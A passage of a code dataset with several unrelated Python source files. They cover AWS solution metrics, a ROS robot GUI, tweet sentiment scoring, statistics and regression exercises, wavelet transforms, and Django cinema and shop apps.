logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nhttp_client = HttpClient()\n\nPHYSICAL_RESOURCE_ID = 'SolutionMetricsSO0280'\n\n# Metric Keys that come in to the Lambda that are not relayed to the IDEA solution metrics\n# ServiceToken contains the AWS account number which would remove the anonymous nature of the metrics\nMETRIC_DENYLIST_KEYS = ['ServiceToken']\n\n\ndef post_metrics(event):\n try:\n request_timestamp = str(datetime.datetime.utcnow().isoformat())\n solution_id = 'SO0280'\n uuid = event['RequestId']\n data = {\n 'RequestType': event['RequestType'],\n 'RequestTimeStamp': request_timestamp\n }\n\n # Need to validate where data is coming from\n for k, v in event['ResourceProperties'].items():\n if (\n k not in data.keys() and\n k not in METRIC_DENYLIST_KEYS\n ):\n data[k] = v\n # Metrics Account (Production)\n metrics_url = os.environ.get('AWS_METRICS_URL', 'https://metrics.awssolutionsbuilder.com/generic')\n\n time_stamp = {'TimeStamp': request_timestamp}\n params = {\n 'Solution': solution_id,\n 'UUID': uuid,\n 'Data': data\n }\n\n metrics = dict(time_stamp, **params)\n json_data = json.dumps(metrics, indent=4)\n logger.info(params)\n headers = {'content-type': 'application/json'}\n req = http_client.http_post('POST',\n metrics_url,\n body=json_data.encode('utf-8'),\n headers=headers)\n rsp_code = req.status\n logger.info(f'ResponseCode: {rsp_code}')\n except Exception as e:\n logger.exception(f'failed to post metrics: {e}')\n\n\ndef handler(event, context):\n \"\"\"\n To improve performance and usability, IDEA sends anonymous metrics to AWS.\n You can disable this by setting 'cluster.solution.enable_solution_metrics' to False with res-admin.sh\n Data tracked:\n - SOCA Instance information\n - SOCA Instance Count\n - SOCA Launch/Delete time\n \"\"\"\n try:\n # Send Anonymous Metrics\n post_metrics(event)\n except Exception as e:\n logger.exception(f'failed to post metrics: {e}')\n finally:\n http_client.send_cfn_response(CfnResponse(\n context=context,\n event=event,\n status=CfnResponseStatus.SUCCESS,\n data={},\n physical_resource_id=PHYSICAL_RESOURCE_ID\n ))\n","repo_name":"aws/res","sub_path":"source/idea/idea-administrator/resources/lambda_functions/idea_solution_metrics/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"34"} +{"seq_id":"7190559053","text":"#!/usr/bin/env python\n# -*- coding: utf -*-\n\nimport roslib\nroslib.load_manifest('amr_ui')\n\nimport sys\nimport math\nfrom PySide.QtGui import *\nfrom PySide.QtCore import *\n\nimport rospy\nimport actionlib\nfrom tf.transformations import quaternion_from_euler\n\nfrom amr_msgs.msg import MoveToAction, MoveToGoal\n\n\nclass Form(QDialog):\n\n def __init__(self, client, parent=None):\n super(Form, self).__init__(parent)\n self.client = client\n # General layout\n new_group = QGroupBox('New goal')\n current_group = QGroupBox('Current goal')\n layout = QHBoxLayout()\n layout.addWidget(new_group)\n layout.addWidget(current_group)\n self.setLayout(layout)\n # Left side -- new goal group\n grid = QGridLayout()\n grid.addWidget(QLabel('X:'), 0, 0)\n self.x_spin = QDoubleSpinBox()\n self.x_spin.setRange(-10, 10)\n self.x_spin.setSingleStep(0.1)\n grid.addWidget(self.x_spin, 0, 1)\n grid.addWidget(QLabel('Y:'), 1, 0)\n self.y_spin = QDoubleSpinBox()\n self.y_spin.setRange(-10, 10)\n self.y_spin.setSingleStep(0.1)\n grid.addWidget(self.y_spin, 1, 1)\n grid.addWidget(QLabel('Yaw:'), 2, 0)\n self.yaw_spin = QSpinBox()\n self.yaw_spin.setRange(0, 360)\n grid.addWidget(self.yaw_spin, 2, 1)\n send_button = QPushButton('Send')\n send_button.clicked.connect(self.button_send_cb)\n grid.addWidget(send_button, 3, 0, 1, 2)\n new_group.setLayout(grid)\n # Right side -- current goal group\n grid = QGridLayout()\n grid.addWidget(QLabel('State:'), 0, 0)\n self.state_text = QLabel('unknown')\n grid.addWidget(self.state_text, 0, 1)\n grid.addWidget(QLabel('Target:'), 1, 0)\n self.target_text = QLabel()\n grid.addWidget(self.target_text, 1, 1)\n grid.addWidget(QLabel('Time left:'), 2, 0)\n grid.addWidget(QLabel('not implemented'), 2, 1)\n cancel_button = QPushButton('Cancel')\n cancel_button.clicked.connect(self.button_cancel_cb)\n grid.addWidget(cancel_button, 3, 0, 1, 2)\n current_group.setLayout(grid)\n\n def update_state_text(self, target=None):\n state = ['pending', 'active', 'preempted', 'succeeded', 'aborted',\n 'rejected', 'preempting', 'recalling', 'recalled',\n 'lost'][self.client.get_state()]\n self.state_text.setText('%s' % state)\n if target is not None:\n self.target_text.setText('%s' % target)\n\n def button_send_cb(self):\n x = self.x_spin.value()\n y = self.y_spin.value()\n yaw = self.yaw_spin.value()\n goal = MoveToGoal()\n q = quaternion_from_euler(0, 0, yaw * math.pi / 180)\n goal.target_pose.pose.position.x = x\n goal.target_pose.pose.position.y = y\n goal.target_pose.pose.orientation.x = q[0]\n goal.target_pose.pose.orientation.y = q[1]\n goal.target_pose.pose.orientation.z = q[2]\n goal.target_pose.pose.orientation.w = q[3]\n self.client.send_goal(goal,\n done_cb=self.action_done_cb,\n active_cb=self.action_active_cb,\n feedback_cb=self.action_feedback_cb)\n goal_text = u'%.2f; %.2f; %i°' % (x, y, yaw)\n self.update_state_text(goal_text)\n\n def button_cancel_cb(self):\n self.client.cancel_goal()\n self.update_state_text('')\n\n def action_done_cb(self, state, result):\n self.update_state_text('')\n\n def action_active_cb(self):\n self.update_state_text()\n\n def action_feedback_cb(self, feeback):\n self.update_state_text()\n\n\nif __name__ == '__main__':\n rospy.init_node('move_to_client_gui')\n client = actionlib.SimpleActionClient('/motion_controller/move_to',\n MoveToAction)\n client.wait_for_server()\n app = QApplication(sys.argv)\n gui = Form(client)\n gui.show()\n rospy.on_shutdown(lambda: app.exit())\n # Qt + Python hack: this timer will allow the interpreter to run each 500\n # ms and at some point in time receive the shutdown callback from ROS.\n timer = QTimer()\n timer.start(500)\n timer.timeout.connect(lambda: None)\n # Start application execution\n sys.exit(app.exec_())\n","repo_name":"minhnh/hbrs_courses","sub_path":"15w_amr/amr_ui/nodes/move_to_client_gui.py","file_name":"move_to_client_gui.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25690054886","text":"#' % Techniques related to NLP\n#' % Xu Tian\n#' % 2017/04/04\n\n#' # Overview\n#' What are the key issues in natual language processing? The motivation to\n#' answer this question is from the need of preparing for the data scientist\n#' interview at BlackRock in Shimon's team. He asked me questions around text\n#' mining or other text related questions since these will be heavily used about\n#' human analytics.\n\n#' # Text mining\n#' - Information retrieval:\n#' - Named entity recognition:\n#' - Sentiment analysis:\n\n#' ## Information retrieval\n#'\n\n#' # Performance and correctness measures\n#' - Precision: (also called positive predictive value) is the fraction of the\n#' documents retrieved that are relevant to the user's information need.\n#' - True positive rate:\n\n#' # Sentiment analysis of tweets\n\nfrom __future__ import division\nimport urllib\nimport csv\nfrom string import punctuation\n\nfiles=['negative.txt', 'positive.txt', 'obama_tweets.txt']\npath='http://www.unc.edu/~ncaren/haphazard/'\nfor file_name in files:\n urllib.request.urlretrieve(path+file_name, file_name)\n\ntweets = open(\"obama_tweets.txt\").read()\ntweets_list = tweets.split('\\n')\n\npos_sent = open(\"positive.txt\").read()\npositive_words = pos_sent.split('\\n')\npositive_counts = []\n\nneg_sent = open('negative.txt').read()\nnegative_words = neg_sent.split('\\n')\nnegative_counts = []\n\nfor tweet in tweets_list:\n positive_counter = 0\n negative_counter = 0\n tweet_processed = tweet.lower()\n for p in list(punctuation):\n tweet_processed = tweet_processed.replace(p, '')\n\n words = tweet_processed.split(' ')\n word_count = len(words)\n for word in words:\n if word in positive_words:\n positive_counter = positive_counter + 1\n elif word in negative_words:\n negative_counter = negative_counter + 1\n\n positive_counts.append(positive_counter/word_count)\n negative_counts.append(negative_counter/word_count)\n\nprint(len(positive_counts))\n\noutput = list(zip(tweets_list, positive_counts, negative_counts))\nwriter = csv.writer(open('tweet_sentiment.csv', 'w'))\nwriter.writerows(output)\n\ndef calStd(l):\n n = len(l)\n avg = sum(l)/n\n return sqrt(sum([(i-avg)**2 for i in l])/n)\n","repo_name":"davisonan/myPython","sub_path":"Projects/words/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10596462205","text":"\r\n# Dataset generation script for Wells Fargo Case Study\r\n# April 2019\r\n\r\n# make sure to install these packages before running:\r\n# pip install pandas\r\n# pip install sodapy\r\n\r\nimport pandas as pd\r\nfrom sodapy import Socrata\r\n\r\n\r\ndef get_case_study_data():\r\n \"\"\"\r\n Function to match complaint narratives to message ids used in case study\r\n\r\n \"\"\"\r\n # Use Socrata client to collect consumer finance data\r\n client = Socrata(\"data.consumerfinance.gov\", None)\r\n results = client.get(\"s6ew-h6mp\", limit=99999999)\r\n\r\n # Convert to pandas DataFrame\r\n results_df = pd.DataFrame.from_records(results)\r\n results_df = results_df[['complaint_id', 'complaint_what_happened']]\r\n results_df.rename(columns={'complaint_what_happened':'text'}, inplace=True)\r\n results_df.complaint_id = results_df.complaint_id.astype('int64')\r\n\r\n # Load Case Study message ids\r\n case_study_df = pd.read_csv(\"case_study_msg_ids.csv\")\r\n case_study_df.complaint_id = case_study_df.complaint_id.astype('int64')\r\n\r\n # Join by msg_id\r\n case_study_df = case_study_df.merge(results_df, on='complaint_id', how='left')\r\n\t\r\n\t# Drop NAs\r\n case_study_df.dropna(inplace=True)\r\n\r\n return case_study_df\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # get data\r\n df = get_case_study_data()\r\n\r\n # write to csv\r\n df.to_csv('case_study_data.csv', header=True, index=False)\r\n\r\n","repo_name":"akalino/comp_embed","sub_path":"src/data/raw/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7605413449","text":"from scipy.stats import chi2\nfrom scipy.stats import norm as normas\nfrom scipy.special import stdtrit\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport math\nimport openpyxl\nfrom matplotlib import pyplot as plt\n\nvar1=[0.1,1.8,3,3,2.4,0.15]\nprimer=[0.05,-3.5,2,2,-4,0.1,-3.8]\nt=primer\n#уровень доверия\nalpha=t[0]\n#гипотеза Н0 а=а0 против H2:a>a0\na0=t[1]\n#гипотеза Н01 σ=σ0 против H3:σ>σ0\nsigma0=t[2]\n#гипотеза Н02 а=а0 против H4:a<-4 при σ=2\nsigma=t[3]\na1=t[4]\n#\neps=t[5]\n\nc1=t[6]\n\n\n\nif (t==var1): top_players = pd.read_excel('./table.xlsx')\nelse: top_players = pd.read_excel('./table1.xlsx')\n\ntop_players.head()\nn=top_players.to_numpy()\na=np.array(n,float)\na=np.concatenate(a)\ncount=len(a)\n\n#Крайние члены вариационного ряда и размах выборки\na_max=a.max()\na_min=a.min()\ncont_of_intervals=int(1+math.log2(count))\nlong_og_intervals=(a_max-a_min)/cont_of_intervals\n# Выборочное среднее\nvibor_sred=sum(a)/count\n# Cреднее квадратичное отклонение\nS2=sum([ (a[i]-vibor_sred)**2 for i in range(count)])/(count-1)\nprint('Выборочное среднее ',vibor_sred)\nprint('Cреднее квадратичное отклонение ',S2)\n\nv_sigma=0\nfor i in range(0,count):\n V_sigma=v_sigma+(a[i]**2-vibor_sred)\n\nv_sigma=v_sigma/count\n\nv=[0]*cont_of_intervals\nfor i in range(0,count):\n e=0\n while(a[i]-a_min>(e+1)*long_og_intervals):\n e+=1\n v[e]+=1\n\n#Относительные частоты\not_v=[v[i]/count for i in range(cont_of_intervals)]\nprint('Сумма относительных частот',sum(ot_v))\n#Плотность относительных частот\nplotnost=[ f\"{v[i]/count/long_og_intervals:.4f}\" for i in range(cont_of_intervals)]\n\ndf = pd.DataFrame({'Интервал': [f\"{a_min+long_og_intervals*(i):.3}\" for i in range(0,cont_of_intervals)],\n ' ': [f\"{a_min+long_og_intervals*(i+1):.3}\" for i in range(0,cont_of_intervals)],\n 'Частота': [v[i] for i in range(cont_of_intervals)],\n 'Относительная частота': [f\"{ot_v[i]:.3}\" for i in range(cont_of_intervals)],\n 'Плотность': plotnost}, index = [''] * (cont_of_intervals))\nprint(df)\n\nplt.figure(1)\nfig, ax = plt.subplots(figsize=(6, 5))\nsns.histplot(a, stat='density', bins=cont_of_intervals)\n\n#f1 = 1/(2*math.sqrt(math.pi*sigma))*(math.exp(1)**(-((x-vibor_sred)**2)/(2*sigma)))\n\nC2=a0+stdtrit(count-1,alpha)/((count/S2)**(1/2))\nprint('Критическое множество - x̅>',C2)\nif(vibor_sred>C2): print('Гипотеза Н0: а=',a0,' отклоняется, так как выборочное среднее принадлежит критическому множеству')\nelse: print('Гипотеза Н0: а=',a0,' принимается, так как выборочное среднее не принадлежит критическому множеству')\n\nC3=chi2.ppf(alpha,count-1)*sigma0**2/(count-1)\nprint('Критическое множество - S^2>',C3)\nif(S2>C2): print('Гипотеза Н0: σ=',sigma0,' отклоняется, так как cреднее квадратичное отклонение принадлежит критическому множеству')\nelse: print('Гипотеза Н0: σ=',sigma0,' принимается, так как реднее квадратичное отклонение не принадлежит критическому множеству')\n\n\nC4=a0+normas.ppf(alpha)*sigma/(count)**(1/2)\nprint('Критическое множество - x̅>',C4)\nif(vibor_sred>C2): print('Гипотеза Н0: а=',a0,' отклоняется, так как выборочное среднее принадлежит критиче��кому множеству')\nelse: print('Гипотеза Н0: а=',a0,' принимается, так как выборочное среднее не принадлежит критическому множеству')\n\nbeta=1-normas.cdf((C4-a1)/sigma*math.sqrt(count))\nprint('β=',beta)\n\n#Оптимальное значение a1', при котором ошибка второго рода не превышает ε\na1_opt=C4-normas.ppf(1-eps)/math.sqrt(count)*sigma\nprint('Оптимальное значение a1 при котором ошибка второго рода не превышает ε',a1_opt)\n\nx = np.linspace(-10, 10)\nf1 = 1/(2*math.sqrt(math.pi*sigma))*(math.exp(1)**(-((x-a0)**2)/(2*sigma)))\nplt.plot(x, f1, ':b', label='N(a0,σ)')\nf2 = 1/(2*math.sqrt(math.pi*sigma))*(math.exp(1)**(-((x-a1)**2)/(2*sigma)))\nplt.plot(x, f2, ':r', label='N(a1,σ)')\nplt.legend()\n\n# Построим последовательный критерий Вальда для проверки гипотезы H_0: a = -3.5 = a_0\n# против альтернативы H_1: a = -4 = a_1 при известном σ = 2 = σ_1.\n\nA=(1-beta)/alpha\nB=beta/(1-alpha)\ndef l_na_l(i):\n ans=((a0**(2)-a1**(2))/(2*sigma**(2))+(a1-a0)*a[0]/(sigma**(2)))\n for j in range(1,i+1):\n ans=ans+((a0**(2)-a1**(2))/(2*sigma**(2))+(a1-a0)*a[j]/(sigma**(2)))\n return math.exp(ans)\n\nplt.figure(1)\nx = [i for i in range(1,count+1)]\ny= [l_na_l(i) for i in range(count)]\nplt.plot(x, y, 'b', label='1st component')\nplt.plot([0,120], [A,A], label='1st component')\nplt.plot([0,120], [B,B], label='1st component')\nc1=c1/count\nprint(\"математическое ожидание момента принятия решения при основной гипотезе H0\", -(alpha*math.log(A)+(1-alpha)*math.log(B))/(a1-a0)**(2)*2*sigma**2)\nprint(\"математическое ожидание момента принятия решения при основной гипотезе H1\", round((beta*math.log(B)+(1-beta)*math.log(A))/(a1-a0)**(2)*2*sigma**2,7))\nc=math.exp(count*((a1-a0)*c1/sigma**(2)+(a0**(2)-a1**(2))/(2*sigma**(2)*count)))\nprint(\"критическое множество: S={L(X,a1)/L(X,a0)>=\", round(c,5),\"}\")\nplt.plot([0,120], [c,c], label='1st component')\n\nplt.show()\n","repo_name":"Ajalova/mathematical-statistics","sub_path":"проверка гипотез/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6182,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39028656650","text":"from django.db import models\nfrom datetime import datetime, timedelta\nfrom django.contrib.auth.models import User\n\n\n# Create your models here.\nclass Pelicula(models.Model):\n titulo = models.CharField(max_length=50)\n descripcion = models.CharField(max_length=500)\n duracion_horas = models.PositiveIntegerField()\n duracion_minutos = models.PositiveIntegerField()\n imagen = models.ImageField(upload_to='peliculas')\n CLASIFICACION_EDAD_CHOICES = [\n ('+0', '+0'),\n ('+7', '+7'),\n ('+12', '+12'),\n ('+16', '+16'),\n ('+18', '+18'),\n ]\n clasificacion_edad = models.CharField(max_length=3, choices=CLASIFICACION_EDAD_CHOICES)\n precio = models.DecimalField(max_digits=5, decimal_places=2) # Campo de precio con 5 dígitos en total y 2 decimales\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name = 'pelicula'\n verbose_name_plural = 'peliculas'\n\n def __str__(self):\n return self.titulo\n \nclass Sala(models.Model):\n nombre = models.CharField(max_length=100)\n num_filas = models.PositiveIntegerField(default=0)\n num_columnas = models.PositiveIntegerField(default=0)\n pelicula = models.ForeignKey(Pelicula, on_delete=models.CASCADE, related_name='salas', null=True, blank=True)\n\n def save(self, *args, **kwargs):\n super().save(*args, **kwargs)\n # Crear las butacas si no existen\n for fila in range(1, self.num_filas + 1):\n for numero in range(1, self.num_columnas + 1):\n num_butaca = (fila - 1) * self.num_columnas + numero\n Butaca.objects.get_or_create(sala=self, fila=fila, numero=numero, num_butaca=num_butaca)\n\n def __str__(self):\n return self.nombre\n\n\nclass Butaca(models.Model):\n fila = models.PositiveIntegerField()\n columna = models.PositiveIntegerField()\n num_butaca = models.PositiveIntegerField()\n sala = models.ForeignKey(Sala, on_delete=models.CASCADE, related_name='butacas')\n ocupada = models.BooleanField(default=False)\n\n class Meta:\n unique_together = ('sala', 'fila', 'columna')\n\n def __str__(self):\n return f'{self.sala.nombre} - Fila {self.fila} - Columna {self.columna}'\n\n\nclass Sesiones(models.Model):\n fecha = models.DateField()\n hora = models.TimeField()\n pelicula = models.ForeignKey(Pelicula, on_delete=models.CASCADE, related_name='sesiones')\n sala = models.ForeignKey(Sala, on_delete=models.CASCADE, related_name='sesiones', null=True, blank=True)\n\n class Meta:\n verbose_name = 'sesion'\n verbose_name_plural = 'sesiones'\n\n def __str__(self):\n return f'{self.fecha} {self.hora} - {self.pelicula.titulo}'\n\n def eliminar_sesiones_vencidas(self):\n now = datetime.now()\n fecha_hora = datetime.combine(self.fecha, self.hora)\n if fecha_hora < now:\n self.delete()\n # Crear nueva sesión para el día siguiente a la misma hora\n new_fecha_hora = fecha_hora + timedelta(days=1)\n nueva_sesion = Sesiones(fecha=new_fecha_hora.date(), hora=new_fecha_hora.time(), pelicula=self.pelicula, sala=self.sala)\n nueva_sesion.save()\n\n\n# class Reserva(models.Model):\n# usuario = models.ForeignKey(User, on_delete=models.CASCADE)\n# butacas_seleccionadas = models.CharField(max_length=255)\n# pelicula = models.ForeignKey(Pelicula, on_delete=models.CASCADE, null=True)\n# precio_total = models.DecimalField(max_digits=6, decimal_places=2)\n# confirmada = models.BooleanField(default=False)\n\n# def __str__(self):\n# return f\"Reserva #{self.id} - Usuario: {self.usuario.username}\"\n","repo_name":"ivanconcejal/EventiketWeb","sub_path":"Peliculas/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14035974207","text":"import pandas as pd\nfrom numpy import abs, array, dot, mean, random, sign, sqrt, zeros\nfrom numpy.linalg import solve\n\nfrom gradients import (adjust_weights, adjust_weights_with_batch,\n update_weights_huber, update_weights_mae,\n update_weights_mse)\nfrom rbf_regression import RBFRegression\nfrom utils import randomize_dataset\n\n\ndef expand_matrix(x, max_coef, min_coef=0):\n result = []\n for v in x:\n result.append([v ** i for i in range(min_coef, max_coef + 1)])\n\n return array(result)\n\n\ndef ols(X, y, degrees):\n X = expand_matrix(X, min_coef=0, max_coef=degrees)\n\n w = solve(dot(X.T, X), dot(X.T, y))\n\n return w\n\n\ndef get_coef_with_gradient(\n x, y, degrees, epochs, lr, func_adjust, batch=None, is_stochastic=False\n):\n X = expand_matrix(x, degrees, 1)\n _, n_cols = X.shape\n w = zeros((n_cols, 1))\n losses = []\n b = 0\n if is_stochastic:\n X, y = randomize_dataset(X, y)\n\n if batch:\n w, b, losses = adjust_weights_with_batch(\n X, y, w, b, epochs, batch, losses, lr, func_adjust\n )\n else:\n w, b, losses = adjust_weights(X, y, w, b, epochs, losses, lr, func_adjust)\n\n return w, b, losses\n\n\ndef get_coef_with_elastic_net(\n x,\n y,\n degree,\n tol=1e-5,\n max_iterators=1e6,\n learning_rate=1e-4,\n ridge_coef=0.6,\n lasso_coef=0.2,\n):\n X = expand_matrix(x, degree, 0)\n _, n_cols = X.shape\n w = random.randn(n_cols).reshape((n_cols, 1)) / sqrt(n_cols)\n skip = False\n losses = []\n count_iter = 0\n while not skip:\n count_iter += 1\n y_hat = dot(X, w)\n dif = dot(X.T, (y_hat - y))\n\n dw = learning_rate * (dif + ridge_coef * sign(w) + lasso_coef * 2 * w)\n w = w - dw\n mse = ((y_hat - y).T.dot(y_hat - y) / n_cols).flatten()\n\n losses.append(mse[0])\n if mean(abs(dw)) <= tol:\n skip = True\n if count_iter == max_iterators:\n skip = True\n\n return w\n\n\nif __name__ == \"__main__\":\n PATH_FILE = \"/home/nobrega/Dados/Documentos/Estudos/notes/dataset/polynomial_regression_data.csv\"\n df = pd.read_csv(PATH_FILE)\n\n X = df.x.values\n y = df.y.values\n y = y.reshape(len(y), 1)\n degree = 7\n weights = ols(X, y, degree)\n weights_gd, linear_coef_gd, losses = get_coef_with_gradient(\n X, y, degree, 2000, lr=0.01, func_adjust=update_weights_mse\n )\n\n weights_gd_batch, linear_coef_bd_batch, losses = get_coef_with_gradient(\n X,\n y,\n degree,\n 20,\n lr=0.01,\n batch=10,\n func_adjust=update_weights_mae,\n is_stochastic=True,\n )\n\n rbf = RBFRegression(20, beta=4)\n rbf.fit(expand_matrix(X, degree, 0), y)\n weights_elastic_net = get_coef_with_elastic_net(X, y, degree)\n y_hat = dot(expand_matrix(X, degree, 0), weights)\n y_hat_gradient = dot(expand_matrix(X, degree, 1), weights_gd) + linear_coef_gd\n y_hat_gradient_batch = (\n dot(expand_matrix(X, degree, 1), weights_gd_batch) + linear_coef_bd_batch\n )\n y_hat_elastic_net = dot(expand_matrix(X, degree, 0), weights_elastic_net)\n y_hat_rbf = rbf.predict(expand_matrix(X, degree, 0))\n from matplotlib import pyplot as plt\n\n plt.plot(y, c=\"c\", label=\"Original\")\n plt.plot(y_hat, c=\"g\", label=\"Predicted\")\n plt.plot(y_hat_gradient, c=\"r\", label=\"Predicted with Gradient\")\n plt.plot(y_hat_gradient_batch, c=\"b\", label=\"Predicted with Gradient and Batch\")\n plt.plot(y_hat_elastic_net, c=\"k\", label=\"Predicted with Elastic Net\")\n plt.plot(y_hat_rbf, c=\"y\", label=\"Predicted with RBF\")\n plt.legend()\n plt.show()\n","repo_name":"GiovaniGitHub/notes","sub_path":"python/polynomial_regression.py","file_name":"polynomial_regression.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"36976482511","text":"import pywt\nimport numpy as np\nimport math\n\ndef get2DWaveletCoefficients(signal, wavelet=\"haar\", mode=\"smooth\"):\n wavedec2 = pywt.wavedec2(signal, wavelet, mode=mode)\n hsm = wavedec2[0]\n wave_dec= wavedec2[1:]\n wave_dct = {}\n for idx_one, array_one in enumerate(wave_dec):\n [cH, cV, cD] = list(map(lambda x: x.flatten(), array_one))\n for idx_two, (this_cH, this_cV, this_cD) in enumerate(zip(cH, cV, cD)):\n wave_dct[(idx_one, idx_two)] = {\"cH\": this_cH, \"cV\": this_cV, \"cD\": this_cD}\n return hsm, wave_dct\n\ndef inverse2DDWT(coeffs, wavelet=\"haar\", mode=\"smooth\"):\n hsm, wave_dict = coeffs\n wave_levels = []\n number_of_roots = len(hsm.flatten())\n dim_of_root = hsm.shape[0]\n nodes_per_tree = (len(wave_dict) + number_of_roots) / (number_of_roots)\n # The number of nodes in a quad-tree of depth n is:\n # 1 + 4 + 4^2 + ... + 4^n = ( 4^(n+1) - 1 ) / 3\n # Thus the number of levels is log_4(number_of_nodes + 1)\n number_of_levels = int(math.log((3 * nodes_per_tree + 1), 4))\n\n # This sort step is actually not needed, as the wavelet coefficients are in the correct order\n # but we do is just to be safe\n sorted_wavedict = sorted(list(wave_dict.items()), key=lambda x: (x[0][0], x[0][1]))\n detail_levels = []\n prevStartIndex = 0\n for i in range(0, number_of_levels):\n startIndexThisLevel = prevStartIndex\n endIndexThisLevel = startIndexThisLevel + number_of_roots*4**i\n\n thisLevel = sorted_wavedict[startIndexThisLevel:endIndexThisLevel]\n thisLevelDetail_cH = np.fromiter(map(lambda x: x[1]['cH'], thisLevel),dtype=float).reshape(dim_of_root*2**i, dim_of_root*2**i)\n thisLevelDetail_cV = np.fromiter(map(lambda x: x[1]['cV'], thisLevel),dtype=float).reshape(dim_of_root*2**i, dim_of_root*2**i)\n thisLevelDetail_cD = np.fromiter(map(lambda x: x[1]['cD'], thisLevel),dtype=float).reshape(dim_of_root*2**i, dim_of_root*2**i)\n detail_level = ([thisLevelDetail_cH, thisLevelDetail_cV, thisLevelDetail_cD])\n detail_levels.append(detail_level)\n prevStartIndex = endIndexThisLevel\n\n wave_levels = detail_levels\n to_reconstruct = [hsm, *wave_levels]\n return pywt.waverec2(to_reconstruct, wavelet, mode=mode)\n\n\n# hsm ,wave_dct = get2DWaveletCoefficients(np.arange(8*8).reshape((8, 8)), \"haar\", \"smooth\")\n# inverse_signal = inverse2DDWT((hsm, wave_dct), \"haar\", \"smooth\")\n# print(\"inverse signal\", inverse_signal)","repo_name":"kanarian/thesis","sub_path":"WaveletTransform/TwoDWaveletTransformer.py","file_name":"TwoDWaveletTransformer.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33974883671","text":"from django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom .models import *\nfrom django.contrib import messages #import messages\nimport json\nimport datetime\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth import authenticate, login, logout\n#from django.shortcuts import render\nfrom django.core.mail import send_mail\n# Create your views here.\nfrom .forms import CreateUserForm\nfrom .utils import cookieCart, cartData, guestOrder\n\n\n\n\ndef registerPage(request):\n form = CreateUserForm()\n\n if request.method == 'POST':\n form = CreateUserForm(request.POST)\n if form.is_valid():\n form.save()\n user = form.cleaned_data.get('username')\n group = Group.objects.get(name='customer')\n user.groups.add(group)\n #Added username after video because of error returning customer name if not added\n Customer.objects.create(\n user=user,\n name=user.username,\n )\n\n messages.success(request, 'Account was created for '+user)\n return redirect('login')\n context = {'form':form}\n return render(request,'register.html',context)\n\n\n\n\ndef home(request):\n return render(request,'home.html',{})\n\ndef menu(request):\n\tdata = cartData(request)\n\n\tcartItems = data['cartItems']\n\torder = data['order']\n\titems = data['items']\n\tproducts = Product.objects.all()\n\tcontext = {'products':products, 'cartItems':cartItems}\n\treturn render(request, 'menu.html', context)\n\n\n\n\n\ndef blog(request):\n return render(request,'blog.html',{})\n\ndef blogsingle(request):\n return render(request,'blog-single.html',{})\n\ndef loginPage(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n\n user = authenticate(request, username=username, password=password)\n\n if user is not None:\n login(request, user)\n return redirect('home')\n else:\n messages.info(request, 'Username or Password is incorrect')\n\n context = {}\n return render(request,'login.html',context)\n\ndef logoutUser(request):\n logout(request)\n return redirect('login')\n\n\ndef contact(request):\n if request.method == \"POST\":\n message_name = request.POST['message-name']\n message_email = request.POST['message-email']\n message = request.POST['message']\n #send Email\n send_mail(\n message_name, #Subject\n message, #message_email\n message_email, #from Email\n ['pritamdebnath297@gmail.com'], #to email\n )\n return render(request,'contact.html',{'message_name':message_name})\n else:\n return render(request,'contact.html',{})\n\n\ndef about(request):\n return render(request,'about.html',{})\n\ndef services(request):\n return render(request,'services.html',{})\n\ndef cart(request):\n\tdata = cartData(request)\n\n\tcartItems = data['cartItems']\n\torder = data['order']\n\titems = data['items']\n\n\tcontext = {'items':items, 'order':order, 'cartItems':cartItems}\n\treturn render(request, 'cart.html', context)\n\n\n\ndef checkout(request):\n\tdata = cartData(request)\n\n\tcartItems = data['cartItems']\n\torder = data['order']\n\titems = data['items']\n\n\tcontext = {'items':items, 'order':order, 'cartItems':cartItems}\n\treturn render(request, 'checkout.html', context)\n\ndef updateItem(request):\n\tdata = json.loads(request.body)\n\tproductId = data['productId']\n\taction = data['action']\n\tprint('Action:', action)\n\tprint('Product:', productId)\n\n\tcustomer = request.user.customer\n\tproduct = Product.objects.get(id=productId)\n\torder, created = Order.objects.get_or_create(customer=customer, complete=False)\n\n\torderItem, created = OrderItem.objects.get_or_create(order=order, product=product)\n\n\tif action == 'add':\n\t\torderItem.quantity = (orderItem.quantity + 1)\n\telif action == 'remove':\n\t\torderItem.quantity = (orderItem.quantity - 1)\n\n\torderItem.save()\n\n\tif orderItem.quantity <= 0:\n\t\torderItem.delete()\n\n\treturn JsonResponse('Item was added', safe=False)\n\n\ndef processOrder(request):\n\ttransaction_id = datetime.datetime.now().timestamp()\n\tdata = json.loads(request.body)\n\n\tif request.user.is_authenticated:\n\t\tcustomer = request.user.customer\n\t\torder, created = Order.objects.get_or_create(customer=customer, complete=False)\n\telse:\n\t\tcustomer, order = guestOrder(request, data)\n\n\ttotal = float(data['form']['total'])\n\torder.transaction_id = transaction_id\n\n\tif total == 